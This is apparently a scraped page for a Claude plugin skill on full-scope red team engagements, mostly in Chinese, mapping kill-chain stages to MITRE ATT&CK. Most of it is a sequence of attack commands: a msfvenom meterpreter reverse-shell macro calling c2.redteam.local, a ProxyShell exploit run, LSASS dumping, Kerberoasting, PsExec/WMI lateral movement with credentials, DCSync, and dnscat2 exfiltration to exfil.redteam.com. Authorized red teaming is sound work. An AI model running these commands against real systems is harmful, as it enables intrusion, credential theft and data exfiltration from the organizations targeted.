Plans and executes full-scope red team engagements covering reconnaissance to exfiltration using MITRE ATT&CK TTPs to assess organizational detection and response capabilities.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
全范围红队演练(Full-Scope Red Team Engagement)模拟真实世界的对手行为,覆盖网络杀伤链(Cyber Kill Chain)的所有阶段——从初始侦察到数据外泄——以评估组织的检测、预防和响应能力。与渗透测试(Penetration Testing)不同,红队行动优先注重隐蔽性、持久化和基于目标的场景,模拟高级持续性威胁(APT)。
Plans and executes full-scope red team engagements from reconnaissance to post-exploitation using MITRE ATT&CK TTPs to evaluate detection and response capabilities.
Plans and executes full-scope red team engagements from reconnaissance to post-exploitation using MITRE ATT&CK TTPs to evaluate detection and response capabilities. Useful for authorized security assessments.
Executes red team exercises simulating stealthy adversary attacks across full lifecycle from reconnaissance to exfiltration, testing detection and response. For red teaming, adversary emulation requests.
Share bugs, ideas, or general feedback.
全范围红队演练(Full-Scope Red Team Engagement)模拟真实世界的对手行为,覆盖网络杀伤链(Cyber Kill Chain)的所有阶段——从初始侦察到数据外泄——以评估组织的检测、预防和响应能力。与渗透测试(Penetration Testing)不同,红队行动优先注重隐蔽性、持久化和基于目标的场景,模拟高级持续性威胁(APT)。
根据威胁配置文件,将演练映射到特定 MITRE ATT&CK 战术和技术:
| 杀伤链阶段 | MITRE ATT&CK 战术 | 示例技术 |
|---|---|---|
| 侦察(Reconnaissance) | TA0043 | T1593 搜索开放网站/域名, T1589 收集受害者身份信息 |
| 资源开发 | TA0042 | T1583.001 获取基础设施:域名, T1587.001 开发能力:恶意软件 |
| 初始访问 | TA0001 | T1566.001 鱼叉式钓鱼附件, T1078 有效账户 |
| 执行 | TA0002 | T1059.001 PowerShell, T1204.002 用户执行:恶意文件 |
| 持久化 | TA0003 | T1053.005 计划任务, T1547.001 注册表运行键 |
| 权限提升 | TA0004 | T1068 利用漏洞提权, T1548.002 UAC 绕过 |
| 防御规避 | TA0005 | T1055 进程注入, T1027 混淆文件 |
| 凭据访问 | TA0006 | T1003.001 LSASS 内存, T1558.003 Kerberoasting |
| 发现 | TA0007 | T1087 账户发现, T1018 远程系统发现 |
| 横向移动 | TA0008 | T1021.002 SMB/Windows 管理共享, T1550.002 哈希传递 |
| 收集 | TA0009 | T1560 归档收集数据, T1213 来自信息存储库的数据 |
| 数据外泄 | TA0010 | T1041 通过 C2 信道外泄, T1048 通过替代协议外泄 |
| 影响 | TA0040 | T1486 加密数据以影响业务, T1489 停止服务 |
# 被动 DNS 枚举
amass enum -passive -d target.com -o amass_passive.txt
# 证书透明度日志搜索
python3 -c "
import requests
url = 'https://crt.sh/?q=%.target.com&output=json'
r = requests.get(url)
for cert in r.json():
print(cert['name_value'])
" | sort -u > subdomains.txt
# LinkedIn 员工枚举
theHarvester -d target.com -b linkedin -l 500 -f harvest_results
# 技术栈指纹识别
whatweb -v target.com --log-json=whatweb.json
# 泄露数据凭据搜索(已授权)
h8mail -t target.com -o h8mail_results.csv
红队演练常见的初始访问向量:
鱼叉式钓鱼(T1566.001):
# 生成带宏的载荷
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=c2.redteam.local LPORT=443 -f vba -o macro.vba
# 配置 GoPhish 活动
# 配置 SMTP 配置文件、带借口的电子邮件模板和着陆页
gophish --config config.json
外部服务利用(T1190):
# 扫描易受攻击的服务
nmap -sV -sC --script vuln -p 80,443,8080,8443 target.com -oA vuln_scan
# 利用已知 CVE(示例:ProxyShell CVE-2021-34473)
python3 proxyshell_exploit.py -t mail.target.com -e attacker@target.com
# 态势感知(T1082, T1016)
whoami /all
systeminfo
ipconfig /all
net group "Domain Admins" /domain
nltest /dclist:target.com
# 从 LSASS 收集凭据(T1003.001)
# 使用 Havoc C2 内置模块
dotnet inline-execute SafetyKatz.exe sekurlsa::logonpasswords
# Kerberoasting(T1558.003)
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# 通过 WMI 横向移动(T1047)
wmiexec.py domain/user:password@target-dc -c "whoami"
# 通过 PsExec 横向移动(T1021.002)
psexec.py domain/admin:password@fileserver.target.com
定义并追求特定目标:
# DCSync 攻击(T1003.006)
secretsdump.py domain/admin:password@dc01.target.com -just-dc-ntlm
# 通过 DNS 外泄数据(T1048.003)
dnscat2 --dns "domain=exfil.redteam.com" --secret=s3cr3t
报告应包含:
| 指标 | 描述 |
|---|---|
| 平均检测时间(MTTD) | 从行动到 SOC 检测的平均时间 |
| 平均响应时间(MTTR) | 从检测到遏制的平均时间 |
| TTP 覆盖率 | 已执行技术中被检测到的百分比 |
| 目标达成率 | 已完成的预定目标百分比 |
| 驻留时间 | 红队维持访问而未被检测到的总时间 |